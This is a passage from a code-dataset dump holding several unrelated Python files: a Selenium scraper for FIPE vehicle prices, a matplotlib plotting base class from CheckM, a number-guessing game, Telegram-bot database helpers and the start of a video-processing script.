file.\r\n :param marca: product name in the web page\r\n :param modelo: web page title\r\n :param ano_modelo: product url\r\n :type ano_modelo: str\r\n :type modelo: str\r\n :type marca: str\r\n \"\"\"\r\n # this dictionary will be used to save data in csv file\r\n self.__values = {\r\n 'marca': marca,\r\n 'modelo': modelo,\r\n 'anoModelo': ano_modelo,\r\n 'preco': preco\r\n }\r\n # __csv_fields make save_data() method writes correctly in csv file.\r\n self.__csv_fields = self.__values.keys()\r\n self.__csv_file_name = filename\r\n\r\n @property\r\n def marca(self):\r\n \"\"\"\r\n Returns the url of a product\r\n :rtype: str\r\n \"\"\"\r\n return self.__values['marca']\r\n\r\n @property\r\n def modelo(self):\r\n \"\"\"\r\n Returns the product web page title\r\n :rtype: str\r\n \"\"\"\r\n return self.__values['modelo']\r\n\r\n @property\r\n def ano_modelo(self):\r\n \"\"\"\r\n Returns the product name\r\n :rtype: str\r\n \"\"\"\r\n return self.__values['anoModelo']\r\n\r\n @property\r\n def preco(self):\r\n return self.__values['preco']\r\n\r\n def __is_csv(self):\r\n \"\"\"\r\n Checks if the csv file already exists.\r\n Returns true if there is the csv file, and false if not.\r\n :rtype: bool\r\n \"\"\"\r\n try:\r\n # just open to check if there is the file\r\n with open(self.__csv_file_name, 'r') as file:\r\n file.close()\r\n return True\r\n # if it do not exists the exception will returns false\r\n except IOError:\r\n return False\r\n\r\n def __create_csv(self):\r\n \"\"\"\r\n Creates a csv file.\r\n Writes in the file the fields of each attributes.\r\n \"\"\"\r\n with open(self.__csv_file_name, 'w', newline='', encoding='utf-8') as csv_file:\r\n writer = csv.DictWriter(csv_file, fieldnames=self.__csv_fields, delimiter=';')\r\n writer.writeheader()\r\n\r\n def save_csv(self):\r\n \"\"\"\r\n Checks if the csv file already exists to write in it the\r\n product name, his title web page and his url.\r\n \"\"\"\r\n if not self.__is_csv():\r\n # creates the csv file if it did not exist.\r\n self.__create_csv()\r\n try:\r\n with open(self.__csv_file_name, 'a', newline='', encoding='utf-8') as csv_file:\r\n writer = csv.DictWriter(csv_file, fieldnames=self.__csv_fields, delimiter=';')\r\n writer.writerow(self.__values)\r\n except IOError: # this exception avoid a product does not have saved in csv file\r\n sleep(0.5)\r\n self.save_csv()\r\n # display on the screen what is being record on csv\r\n for key, value in self.__values.items():\r\n print('{}: {}'.format(key, value), end='; ' if key != 'preco' else '\\n')\r\n\r\n def __str__(self):\r\n return 'PageValues: (marca: {}, modelo: {}, ano_modelo: {}, preco:{}'.format(\r\n self.marca, self.modelo, self.ano_modelo, self.preco\r\n )\r\n\r\n\r\nclass Element:\r\n def __init__(self, div, select):\r\n self.div = div # browser.find_element_by_id('selectTabelaReferencia'+vehicle+'_chosen')\r\n self.element = select # browser.find_element_by_id('selectTabelaReferencia'+vehicle)\r\n self.select = Select(self.element)\r\n self.options = [x for x in self.element.find_elements_by_tag_name('option')]\r\n self.texts = [r.get_attribute('innerHTML').replace('&', '&') for r in self.options]\r\n\r\n def div_click(self):\r\n self.div.click()\r\n\r\n def selelct_by_index(self, index):\r\n self.select.select_by_index(index)\r\n\r\n\r\nclass DataElement(Element):\r\n def __init__(self, div, select):\r\n super(DataElement, self).__init__(div, select)\r\n self.input = self.div.find_element_by_tag_name('input')\r\n\r\n def input_send(self, keys):\r\n self.input.send_keys(keys)\r\n self.input.send_keys(Keys.ENTER)\r\n\r\n def selection(self, text):\r\n self.div_click()\r\n self.input_send(text)\r\n pause()\r\n\r\n\r\nclass Database:\r\n logging.basicConfig(level=logging.INFO)\r\n logger = logging.getLogger('DATABASE')\r\n\r\n handler = logging.FileHandler('database.log')\r\n handler.setLevel(logging.DEBUG)\r\n formater = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\n handler.setFormatter(formater)\r\n logger.addHandler(handler)\r\n\r\n engine = create_engine('sqlite:///fipe.db')\r\n Base.metadata.bind = engine\r\n DBSession = sessionmaker(bind=engine)\r\n session = DBSession()\r\n\r\n def save_database(self, data):\r\n try:\r\n self.logger.info('save_database {}'.format(str(data)))\r\n self.session.add(data)\r\n self.session.commit()\r\n except Exception as error:\r\n self.logger.error('save database {} {}'.format(data, error))\r\n pause()\r\n self.save_database(data)\r\n\r\n def save_reference(self, reference_list):\r\n self.logger.info('save_reference {}'.format(str(reference_list)))\r\n if self.has_unvisited_reference() or self.reference_count() == 0:\r\n for period in reference_list:\r\n self.logger.info('period: {}'.format(period))\r\n if self.has_not_reference(period):\r\n reference = Reference(period=period)\r\n self.save_database(reference)\r\n\r\n def reference_count(self):\r\n self.logger.info('has_reference')\r\n query = self.session.query(Reference).count()\r\n self.logger.info('has_reference {}'.format(query))\r\n return query\r\n\r\n def has_not_reference(self, period):\r\n self.logger.info('has_not_reference {}'.format(str(period)))\r\n query = self.session.query(Reference).filter(Reference.period == period).count()\r\n self.logger.info('has_not_reference {} {}'.format(period, True if query == 0 else False))\r\n if query == 0:\r\n return True\r\n return False\r\n\r\n def has_unvisited_reference(self):\r\n self.logger.info('has_unvisited_reference')\r\n query = self.session.query(Reference).filter(Reference.status == UNVISITED).count()\r\n self.logger.info('has_unvisited_reference {}'.format(True if query > 0 else False))\r\n if query > 0:\r\n return True\r\n return False\r\n\r\n def get_unvisted_reference(self):\r\n self.logger.info('has_unvisited_reference')\r\n query = self.session.query(Reference).filter(Reference.status == UNVISITED).all()\r\n self.logger.info('has_unvisited_reference {}'.format(query))\r\n return query[0]\r\n\r\n def has_marca_unvisited(self):\r\n self.logger.info('has_marca_unvisited')\r\n query = self.session.query(Marca).filter(Marca.status == UNVISITED).count()\r\n self.logger.info('has_query_unvisited'.format(True if query > 0 else False))\r\n if query > 0:\r\n return True\r\n return False\r\n\r\n def has_marca(self, name):\r\n self.logger.info('has_marca {}'.format(name))\r\n query = self.session.query(Marca).filter(Marca.name == name).count()\r\n self.logger.info('has_marca {} - {}'.format(name, True if query > 0 else False))\r\n if query > 0:\r\n return True\r\n return False\r\n\r\n def set_unvisited_marca(self, name):\r\n self.logger.info('set_marca_unvisited {}'.format(name))\r\n marca = self.session.query(Marca).filter(Marca.name == name).one()\r\n marca.status = UNVISITED\r\n self.save_database(marca)\r\n self.logger.info('set_marca_unvisited {}'.format(marca.status))\r\n\r\n def get_marca_id(self, name):\r\n self.logger.info('get_marca_id {}'.format(name))\r\n query = self.session.query(Marca).filter(Marca.name == name).one()\r\n self.logger.info('get_marca_id {}'.format(query.id))\r\n return query.id\r\n\r\n def save_marcas(self, marca_list, reference_id):\r\n self.logger.info('save_marca {} - {}'.format(reference_id, marca_list))\r\n for marca in marca_list:\r\n self.logger.info('for marca in marca_list: {}'.format(marca))\r\n if self.has_marca(marca):\r\n self.logger.info('setting unvisited marca {}'.format(marca))\r\n self.set_unvisited_marca(marca)\r\n marca_id = self.get_marca_id(marca)\r\n else:\r\n self.logger.info('new marca {}'.format(marca))\r\n new_marca = Marca(name=marca)\r\n self.save_database(new_marca)\r\n marca_id = new_marca.id\r\n reference_marca = ReferenceHasMarca(reference_id=reference_id, marca_id=marca_id)\r\n self.save_database(reference_marca)\r\n\r\n def get_unvisted_marca(self):\r\n self.logger.info('get_unvisited_marca')\r\n query = self.session.query(Marca).filter(Marca.status == UNVISITED).all()\r\n self.logger.info('get_unvisited_marca {}'.format(query[0]))\r\n return query[0]\r\n\r\n def save_modelos(self, modelo_list, marca_id):\r\n self.logger.info('save_modelos {} {}'.format(marca_id, modelo_list))\r\n for modelo in modelo_list:\r\n if self.has_modelo(modelo):\r\n self.logger.info('has modelo {}'.format(modelo))\r\n self.logger.info('setting unvisited modelo {}'.format(modelo))\r\n self.set_unvisted_modelo(modelo)\r\n else:\r\n self.logger.info('new modelo {}'.format(modelo))\r\n self.logger.info('hasn\\'t modelo')\r\n new_modelo = Modelo(name=modelo, marca_id=marca_id)\r\n self.save_database(new_modelo)\r\n\r\n def has_modelo(self, name):\r\n self.logger.info('has_modelo {}'.format(name))\r\n query = self.session.query(Modelo).filter(Modelo.name == name).count()\r\n self.logger.info('has_modelo {} {}'.format(name, True if query > 0 else False))\r\n if query > 0:\r\n return True\r\n return False\r\n\r\n def set_unvisted_modelo(self, name):\r\n self.logger.info('set_unvisited_modelo {}'.format(name))\r\n modelo = self.session.query(Modelo).filter(Modelo.name == name).one()\r\n modelo.status = UNVISITED\r\n self.save_database(modelo)\r\n self.logger.info('set_unvisited_modelo {} {}'.format(modelo.name, modelo.id))\r\n\r\n def has_unvisited_modelo(self):\r\n self.logger.info('has_unvisited_modelo')\r\n query = self.session.query(Modelo).filter(Modelo.status == UNVISITED).count()\r\n self.logger.info('has_unvisited_modelo {}'.format(True if query > 0 else False))\r\n if query > 0:\r\n return True\r\n return False\r\n\r\n def get_unvisited_modelo(self):\r\n self.logger.info('get_unvisited_modelo')\r\n query = self.session.query(Modelo).filter(Modelo.status == UNVISITED).all()\r\n self.logger.info('get_unvisited_modelo {}'.format(query[0]))\r\n return query[0]\r\n\r\n def has_unvisited_ano(self):\r\n self.logger.info('has_unvisited_ano')\r\n query = self.session.query(AnoModelo).filter(AnoModelo.status == UNVISITED).count()\r\n self.logger.info('has_unvisited_ano {}'.format(True if query > 0 else False))\r\n if query > 0:\r\n return True\r\n return False\r\n\r\n def save_anos(self, ano_list, modelo_id):\r\n self.logger.info('save_anos {} {}'.format(modelo_id, ano_list))\r\n for ano in ano_list:\r\n self.logger.info('new ano {}'.format(ano))\r\n new_ano = AnoModelo(ano_modelo=ano, modelo_id=modelo_id)\r\n self.save_database(new_ano)\r\n\r\n def has_ano(self, ano):\r\n self.logger.info('has_ano {}'.format(ano))\r\n query = self.session.query(AnoModelo).filter(AnoModelo.ano_modelo == ano).count()\r\n self.logger.info('has_ano {} {} {}'.format(ano.id, ano.ano_modelo, True if query > 0 else False))\r\n if query > 0:\r\n return True\r\n return False\r\n\r\n def set_unvisited_ano(self, ano):\r\n self.logger.info('set_unvisited_ano {}'.format(ano))\r\n ano = self.session.query(AnoModelo).filter(AnoModelo.ano_modelo == ano).one()\r\n ano.status = UNVISITED\r\n self.save_database(ano)\r\n self.logger.info('set_unvisited_ano {} {}'.format(ano.ano_modelo, ano.status))\r\n\r\n def get_unvisited_ano(self):\r\n self.logger.info('get_unvisited_ano')\r\n query = self.session.query(AnoModelo).filter(AnoModelo.status == UNVISITED).all()\r\n self.logger.info('get_unvisited_ano {}'.format(query[0].ano_modelo))\r\n return query[0]\r\n\r\n def set_modelo_visited(self, id):\r\n self.logger.info('set_modelo_visited {}'.format(id))\r\n modelo = self.session.query(Modelo).filter(Modelo.id == id).one()\r\n modelo.status = VISITED\r\n self.save_database(modelo)\r\n self.logger.info('set_modelo_visited {} {}'.format(modelo.name, modelo.status))\r\n\r\n def set_ano_visited(self, id):\r\n self.logger.info('set_ano_visited {}'.format(id))\r\n ano = self.session.query(AnoModelo).filter(AnoModelo.id == id).one()\r\n ano.status = VISITED\r\n self.save_database(ano)\r\n self.logger.info('set_ano_visited {} {}'.format(ano.ano_modelo, ano.status))\r\n\r\n def set_marca_visited(self, id):\r\n self.logger.info('set_marca_visited {}'.format(id))\r\n marca = self.session.query(Marca).filter(Marca.id == id).one()\r\n marca.status = VISITED\r\n self.save_database(marca)\r\n self.logger.info('set_marca_visited {} {}'.format(marca.name, marca.status))\r\n\r\n def set_reference_visited(self, id):\r\n self.logger.info('set_reference_visited {}'.format(id))\r\n ref = self.session.query(Reference).filter(Reference.id == id).one()\r\n ref.status = VISITED\r\n self.save_database(ref)\r\n self.logger.info('set_reference_visited {} {}'.format(ref.name, ref.status))\r\n\r\n\r\nclass App:\r\n logging.basicConfig(level=logging.INFO)\r\n logger = logging.getLogger('App')\r\n\r\n handler = logging.FileHandler('App.log')\r\n handler.setLevel(logging.DEBUG)\r\n formater = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\n handler.setFormatter(formater)\r\n logger.addHandler(handler)\r\n\r\n def __init__(self):\r\n self.logger.info('criando App()')\r\n self.options = Options()\r\n self.options.add_argument('-headless')\r\n self.logger.info('iniciando browser')\r\n self.browser = webdriver.Firefox(\r\n executable_path=path+'/firefox/geckodriver',\r\n firefox_options=self.options\r\n )\r\n self.logger.info('abrindo http://veiculos.fipe.org.br/')\r\n self.browser.get(\"http://veiculos.fipe.org.br/\")\r\n self.logger.info('abrindo banco de dados')\r\n self.database = Database()\r\n self.reference_element = None\r\n self.marca_element = None\r\n self.modelo_element = None\r\n self.ano_element = None\r\n self.reference = None\r\n self.marca = None\r\n self.modelo = None\r\n self.ano = None\r\n self.logger.info('App() criado')\r\n\r\n def restart_browser(self):\r\n self.logger.info('encerrando browser')\r\n self.browser.quit()\r\n self.logger.info('dormindo')\r\n for i in range(1800): # 1800 * 1 segundos == 30 minutos\r\n pause()\r\n self.logger.info('reiniciano browser')\r\n self.browser = webdriver.Firefox(\r\n executable_path=path+'/firefox/geckodriver',\r\n firefox_options=self.options\r\n )\r\n self.logger.info('abrindo http://veiculos.fipe.org.br/')\r\n try:\r\n self.browser.get(\"http://veiculos.fipe.org.br/\")\r\n self.browser.find_element_by_link_text(MainDivName).click()\r\n except Exception as err:\r\n self.logger.error(err)\r\n self.restart_browser()\r\n\r\n def selection(self, div, input, text):\r\n self.logger.info('inserindo {} text no input'.format(text))\r\n div.click()\r\n input.send_keys(text)\r\n input.send_keys(Keys.ENTER)\r\n pause()\r\n\r\n def save_search(self):\r\n self.logger.info('salvando busca')\r\n self.browser.find_element_by_id('buttonPesquisar'+vehicle).click()\r\n self.logger.info('botão pesquisarclicado')\r\n result = self.browser.find_element_by_id('resultadoConsulta'+vehicle+'Filtros')\r\n self.logger.info('pegando valores dos campos')\r\n table = result.find_element_by_tag_name('table')\r\n info = table.find_elements_by_tag_name('td')\r\n values = PageValues(info[5].text, info[7].text, info[9].text, info[15].text)\r\n self.logger.info('valores da tabela pegos: {}'.format(values))\r\n self.ano.codigo_fipe = info[3].text\r\n self.ano.preco = info[15].text\r\n self.logger.info('atualizando valores no banco de dados')\r\n values.save_csv()\r\n self.browser.find_element_by_id('buttonLimparPesquisar'+vehicle).click()\r\n self.logger.info('botão limpar busca clicado')\r\n pause()\r\n self.logger.info('pausa terminada')\r\n\r\n def select_reference(self):\r\n self.logger.info('selecionando mês de referência')\r\n self.reference_element = Element(\r\n self.browser.find_element_by_id('selectTabelaReferencia'+vehicle+'_chosen'),\r\n self.browser.find_element_by_id('selectTabelaReferencia'+vehicle)\r\n )\r\n self.logger.info('Elemento reference criado')\r\n self.database.save_reference(self.reference_element.texts)\r\n self.logger.info('lista do combobox de referência salva no banco de dados')\r\n while self.database.has_unvisited_reference():\r\n self.logger.info('existe item no combobox não visitado')\r\n self.reference = self.database.get_unvisted_reference()\r\n self.logger.info('referencia pega no banco de dados: {}'.format(self.reference))\r\n self.reference_element.div_click()\r\n self.logger.info('div referencia clicada')\r\n self.reference_element.selelct_by_index(self.reference.id - 1)\r\n self.logger.info('selecionado o item {} do combobox'.format(self.reference.id - 1))\r\n self.select_marca()\r\n self.database.set_reference_visited(self.reference.id)\r\n self.logger.info('reference atualizado para visitado {}'.format(self.reference.status))\r\n\r\n def select_marca(self):\r\n self.logger.info('selecionando marca')\r\n self.marca_element = DataElement(\r\n self.browser.find_element_by_id('selectMarca'+vehicle+'_chosen'),\r\n self.browser.find_element_by_id('selectMarca'+vehicle)\r\n )\r\n self.logger.info('DataElement criado')\r\n\r\n self.logger.info('consultando banco de dados para salvar as marcas')\r\n if not self.database.has_marca_unvisited():\r\n self.database.save_marcas(self.marca_element.texts, self.reference.id)\r\n\r\n while self.database.has_marca_unvisited():\r\n self.logger.info('marca não visitada')\r\n self.marca = self.database.get_unvisted_marca()\r\n self.logger.info('marca selecionada: {}'.format(self.marca.name))\r\n self.marca_element.selection(self.marca.name)\r\n self.logger.info('fazendo seleção da marca')\r\n pause()\r\n self.logger.info('pausa para load do ajax terminada')\r\n self.select_modelo()\r\n self.database.set_marca_visited(self.marca.id)\r\n self.logger.info('marca {} marcada como visitada {}'.format(self.marca.name, self.marca.status))\r\n self.logger.info('todos os modelos da marca {} foram visitados'.format(self.marca.name))\r\n\r\n def select_modelo(self):\r\n self.logger.info('selecionando modelo')\r\n self.modelo_element = DataElement(\r\n self.browser.find_element_by_id('selectAnoModelo'+vehicle+'_chosen'),\r\n self.browser.find_element_by_id('selectAnoModelo'+vehicle)\r\n )\r\n self.logger.info('DataElement do modelo lido')\r\n\r\n self.logger.info('checando banco de dados para salvar novos elementos')\r\n if not self.database.has_unvisited_modelo():\r\n self.database.save_modelos(self.modelo_element.texts, self.marca.id)\r\n while self.database.has_unvisited_modelo():\r\n self.logger.info('modelos não visitados')\r\n self.modelo = self.database.get_unvisited_modelo()\r\n self.logger.info('modelo selecionado do banco de dados: {}'.format(self.modelo.name))\r\n self.marca_element.selection(self.marca.name)\r\n self.logger.info('elemento marca selecionado')\r\n self.modelo_element.selection(self.modelo.name)\r\n self.logger.info('elemento modelo selecionado')\r\n self.select_ano()\r\n self.database.set_modelo_visited(self.modelo.id)\r\n self.logger.info('modelo {} atualizado para visitado: {}'.format(self.modelo.name, self.modelo.status))\r\n self.logger.info('não existe mais modelo a visitar')\r\n\r\n def select_ano(self):\r\n self.logger.info('selecionando ano do modelo')\r\n self.ano_element = DataElement(\r\n self.browser.find_element_by_id('selectAno'+vehicle+'_chosen'),\r\n self.browser.find_element_by_id('selectAno'+vehicle)\r\n )\r\n self.logger.info('DataElement do ano criado')\r\n\r\n self.logger.info('Verificando banco de dados para salvar novos itens')\r\n if not self.database.has_unvisited_ano():\r\n self.database.save_anos(self.ano_element.texts, self.modelo.id)\r\n\r\n while self.database.has_unvisited_ano():\r\n self.logger.info('Possui ano não visitado')\r\n try:\r\n self.ano = self.database.get_unvisited_ano()\r\n self.logger.info('ano obtido do banco de dados: {}'.format(self.ano.ano_modelo))\r\n self.marca_element.selection(self.marca.name)\r\n self.logger.info('selecionando marca')\r\n self.modelo_element.selection(self.modelo.name)\r\n self.logger.info('selecionando modelo')\r\n self.ano_element.selection(self.ano.ano_modelo)\r\n self.logger.info('selecionando ano')\r\n self.save_search()\r\n self.logger.info('busca salva')\r\n self.database.set_ano_visited(self.ano.id)\r\n self.logger.info('ano {} marcado como visitado {}'.format(self.ano.ano_modelo, self.ano.status))\r\n except Exception as error:\r\n self.logger.error('não foi possível selecionar os elementos {}'.format(error))\r\n self.restart_browser()\r\n self.logger.info('Não possui anos não visitados')\r\n\r\n def run(self):\r\n self.browser.find_element_by_link_text(MainDivName).click()\r\n self.select_reference()\r\n\r\n#Change to game crawler detection, might have to use randint\r\ndef pause():\r\n sleep(1)\r\n\r\n\r\nif __name__ == '__main__':\r\n start = time.time()\r\n app = App()\r\n # app.run()\r\n try:\r\n app.run()\r\n except Exception as e:\r\n print(e)\r\n app.browser.quit()\r\n total = int(time.time() - start)\r\n second = total % 60\r\n minute = total // 60 % 60\r\n hour = total // 3600\r\n print('{}:{}:{}'.format(hour, minute, second))\r\n","repo_name":"pumar/fipe-crawler","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":24253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21020906994","text":"###############################################################################\r\n#\r\n# AbstractPlot.py - Abstract base class for plotting.\r\n#\r\n###############################################################################\r\n# #\r\n# This program is free software: you can redistribute it and/or modify #\r\n# it under the terms of the GNU General Public License as published by #\r\n# the Free Software Foundation, either version 3 of the License, or #\r\n# (at your option) any later version. #\r\n# #\r\n# This program is distributed in the hope that it will be useful, #\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\r\n# GNU General Public License for more details. #\r\n# #\r\n# You should have received a copy of the GNU General Public License #\r\n# along with this program. If not, see . #\r\n# #\r\n###############################################################################\r\n\r\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\r\nfrom matplotlib.figure import Figure\r\nimport matplotlib.transforms as mtransforms\r\n\r\nfrom matplotlib.patches import Rectangle\r\n\r\nimport matplotlib as mpl\r\n\r\nimport numpy as np\r\n\r\n\r\nclass AbstractPlot(FigureCanvas):\r\n '''\r\n Abstract base class for plotting.\r\n '''\r\n def __init__(self, options):\r\n self.options = options\r\n\r\n # Global plot settings\r\n mpl.rcParams['font.size'] = self.options.font_size\r\n mpl.rcParams['axes.titlesize'] = self.options.font_size\r\n mpl.rcParams['axes.labelsize'] = self.options.font_size\r\n mpl.rcParams['xtick.labelsize'] = self.options.font_size\r\n mpl.rcParams['ytick.labelsize'] = self.options.font_size\r\n mpl.rcParams['legend.fontsize'] = self.options.font_size\r\n mpl.rcParams['svg.fonttype'] = 'none'\r\n\r\n self.fig = Figure(facecolor='white', dpi=options.dpi)\r\n\r\n FigureCanvas.__init__(self, self.fig)\r\n\r\n self.cid = None\r\n\r\n self.type = ''\r\n self.name = ''\r\n\r\n self.axesColour = (0.5, 0.5, 0.5)\r\n\r\n def savePlot(self, filename, dpi=300):\r\n imgFormat = filename[filename.rfind('.') + 1:len(filename)]\r\n if imgFormat in ['png', 'pdf', 'ps', 'eps', 'svg']:\r\n self.fig.savefig(filename, format=imgFormat, dpi=dpi, facecolor='white', edgecolor='white', bbox_inches='tight')\r\n else:\r\n pass\r\n\r\n def labelExtents(self, xLabels, xFontSize, xRotation, yLabels, yFontSize, yRotation):\r\n self.fig.clear()\r\n\r\n tempAxes = self.fig.add_axes([0, 0, 1.0, 1.0])\r\n\r\n tempAxes.set_xticks(np.arange(len(xLabels)))\r\n tempAxes.set_yticks(np.arange(len(yLabels)))\r\n\r\n xText = tempAxes.set_xticklabels(xLabels, size=xFontSize, rotation=xRotation)\r\n yText = tempAxes.set_yticklabels(yLabels, size=yFontSize, rotation=yRotation)\r\n\r\n bboxes = []\r\n for label in xText:\r\n bbox = label.get_window_extent(self.get_renderer())\r\n bboxi = bbox.inverse_transformed(self.fig.transFigure)\r\n bboxes.append(bboxi)\r\n xLabelBounds = mtransforms.Bbox.union(bboxes)\r\n\r\n bboxes = []\r\n for label in yText:\r\n bbox = label.get_window_extent(self.get_renderer())\r\n bboxi = bbox.inverse_transformed(self.fig.transFigure)\r\n bboxes.append(bboxi)\r\n yLabelBounds = mtransforms.Bbox.union(bboxes)\r\n\r\n self.fig.clear()\r\n\r\n return xLabelBounds, yLabelBounds\r\n\r\n def xLabelExtents(self, labels, fontSize, rotation=0):\r\n self.fig.clear()\r\n\r\n tempAxes = self.fig.add_axes([0, 0, 1.0, 1.0])\r\n tempAxes.set_xticks(np.arange(len(labels)))\r\n xLabels = tempAxes.set_xticklabels(labels, size=fontSize, rotation=rotation)\r\n\r\n bboxes = []\r\n for label in xLabels:\r\n bbox = label.get_window_extent(self.get_renderer())\r\n bboxi = bbox.inverse_transformed(self.fig.transFigure)\r\n bboxes.append(bboxi)\r\n xLabelBounds = mtransforms.Bbox.union(bboxes)\r\n\r\n self.fig.clear()\r\n\r\n return xLabelBounds\r\n\r\n def yLabelExtents(self, labels, fontSize, rotation=0):\r\n self.fig.clear()\r\n\r\n tempAxes = self.fig.add_axes([0, 0, 1.0, 1.0])\r\n tempAxes.set_yticks(np.arange(len(labels)))\r\n yLabels = tempAxes.set_yticklabels(labels, size=fontSize, rotation=rotation)\r\n\r\n bboxes = []\r\n for label in yLabels:\r\n bbox = label.get_window_extent(self.get_renderer())\r\n bboxi = bbox.inverse_transformed(self.fig.transFigure)\r\n bboxes.append(bboxi)\r\n yLabelBounds = mtransforms.Bbox.union(bboxes)\r\n\r\n self.fig.clear()\r\n\r\n return yLabelBounds\r\n\r\n def formatLabels(self, labels):\r\n formattedLabels = []\r\n for label in labels:\r\n value = float(label.get_text())\r\n if value < 0.01:\r\n valueStr = '%.2e' % value\r\n if 'e-00' in valueStr:\r\n valueStr = valueStr.replace('e-00', 'e-')\r\n elif 'e-0' in valueStr:\r\n valueStr = valueStr.replace('e-0', 'e-')\r\n else:\r\n valueStr = '%.3f' % value\r\n\r\n formattedLabels.append(valueStr)\r\n\r\n return formattedLabels\r\n\r\n def removeExtraZeros(self, label):\r\n if '.' in label:\r\n while label[-1] == '0':\r\n label = label[0:-1]\r\n\r\n if label[-1] == '.': # remove potential trailing decimal point\r\n label = label[0:-1]\r\n\r\n return label\r\n\r\n def boundingBox(self, data, ax, label, bBoundingBoxes, bLabels):\r\n ''' Draw bounding box around data.'''\r\n data = np.array(data)\r\n\r\n width = max(data[:, 0]) - min(data[:, 0])\r\n height = max(data[:, 1]) - min(data[:, 1])\r\n r = Rectangle((min(data[:, 0]), min(data[:, 1])), width, height)\r\n\r\n if bBoundingBoxes:\r\n ax.add_artist(r)\r\n r.set_clip_box(ax.bbox)\r\n r.set_alpha(0.1)\r\n r.set_facecolor((0.5, 0.5, 0.5))\r\n\r\n if bLabels:\r\n ax.annotate(label, xy=(min(data[:, 0]), max(data[:, 1])), xytext=(0, 0),\r\n textcoords='offset points', ha='right', va='bottom',\r\n bbox=dict(boxstyle='round,pad=0.5', fc=(0.5, 0.5, 0.5), alpha=0.1))\r\n","repo_name":"jtamames/SqueezeMeta","sub_path":"lib/checkm/plot/AbstractPlot.py","file_name":"AbstractPlot.py","file_ext":"py","file_size_in_byte":6863,"program_lang":"python","lang":"en","doc_type":"code","stars":295,"dataset":"github-code","pt":"61"} +{"seq_id":"22264273417","text":"import random\n\ntopOfRange = input(\"Type a number: \")\n\nif topOfRange.isdigit():\n topOfRange = int(topOfRange)\n\n if topOfRange <= 0:\n print(\"Please type a number greater than 0 next time. \")\n quit()\nelse:\n print(\"Please type a number next time\")\n quit()\n\nrandomNumber = random.randint(0, topOfRange)\nguesses = 0\n\nwhile True:\n guesses += 1\n userGuess = input(\"Make a guess. \")\n if userGuess.isdigit():\n userGuess = int(userGuess)\n else:\n print(\"Please type a number next time\")\n continue\n\n if userGuess == randomNumber:\n print(\"You got it right!\")\n break\n elif userGuess > randomNumber:\n print(\"You were above the number.\")\n else:\n print(\"You were below the number. \")\n\nprint(\"You got it in\", guesses, \"guesses\")\n","repo_name":"neophyte-programmer/allpythonexecises","sub_path":"numberGuesserGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38052641999","text":"from . import dB\n\n# ----------------------BoardCast_db-----------------\n\n\ndef add_user(id):\n board = eval(dB.get(\"BOARDCAST_USERS\") or \"[]\")\n if id not in board:\n board.append(id)\n dB.set(\"BOARDCAST_USERS\", str(board).replace(\" \", \"\"))\n\n\ndef rem_user(id):\n board = eval(dB.get(\"BOARDCAST_USERS\") or \"[]\")\n if id in board:\n board.remove(id)\n dB.set(\"BOARDCAST_USERS\", str(board).replace(\" \", \"\"))\n\n\ndef get_users():\n return eval(dB.get(\"BOARDCAST_USERS\") or \"[]\")\n\n\n# ------------------------STORE_DB------------------\n\n\ndef info_own_iteam(unique_id, owner_id):\n _ = eval(dB.get(\"OWNERS_OF_ITEAMS\") or \"{}\")\n xx = _.get(str(owner_id)) or []\n if unique_id not in xx:\n xx.append(unique_id)\n _.update({str(owner_id): xx})\n dB.set(\"OWNERS_OF_ITEAMS\", str(_))\n\n\ndef get_info_own_iteam(owner_id):\n _ = eval(dB.get(\"OWNERS_OF_ITEAMS\") or \"{}\")\n return _.get(str(owner_id)) or []\n\n\ndef store_iteam(unique_id, id):\n _ = eval(dB.get(\"STORE\") or \"{}\")\n _.update({unique_id: str(id)})\n dB.set(\"STORE\", str(_))\n\n\ndef get_stored_iteam(unique_id):\n _ = eval(dB.get(\"STORE\") or \"{}\")\n if _.get(unique_id):\n try:\n return eval(_[unique_id])\n except BaseException:\n return None\n else:\n return None\n\n\ndef del_stored_iteam(unique_id, id):\n _ = eval(dB.get(\"STORE\") or \"{}\")\n _x = eval(dB.get(\"OWNERS_OF_ITEAMS\") or \"{}\")\n if unique_id in _:\n _.pop(unique_id)\n dB.set(\"STORE\", str(_))\n xn = _x.get(str(id)) or []\n if unique_id in xn:\n xn.remove(unique_id)\n dB.set(\"OWNERS_OF_ITEAMS\", str(_x))\n","repo_name":"kaif-00z/Public-FileSharingBot","sub_path":"bot/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"2777988804","text":"import numpy as np\nimport cv2\nimport math\nfrom sklearn import preprocessing\nfrom numpy import unravel_index\nimport time\nimport os\n\ndef Dollar(video):\n video_read = \"videos_hmdb/\" + video\n cap = cv2.VideoCapture(video_read)\n\n # ==========================================================\n # i = 1;\n # while (True):\n # # Capture frame-by-frame\n # ret, frame = cap.read()\n #\n # # Our operations on the frame come here\n # # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n #\n # # Display the resulting frame\n # cv2.imshow('frame', frame)\n # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # cv2.imwrite('img/gray/' + str(i) + '.jpg', gray)\n # i += 1\n # if cv2.waitKey(0) & 0xFF == ord('q'):\n # break\n #\n # # When everything done, release the capture\n # cap.release()\n # cv2.destroyAllWindows()\n\n frames = []\n while True:\n ret, frame = cap.read()\n if not ret:\n break\n # t = resize(frame, (200, 200, 3))\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # cv2.imshow('img2', gray)\n\n # img = np.zeros((100, 100, 3))\n # for i in range(3):\n # img[:, :, i] = cv2.resize(frame[:, :, i], (100, 100))\n # cv2.imshow('img', cv2.resize(frame[:, :, i], (224, 224)))\n # if cv2.waitKey(0) & 0xFF == ord('q'):\n # break\n\n # print(img.shape)\n # img = img.astype(np.uint8)\n # 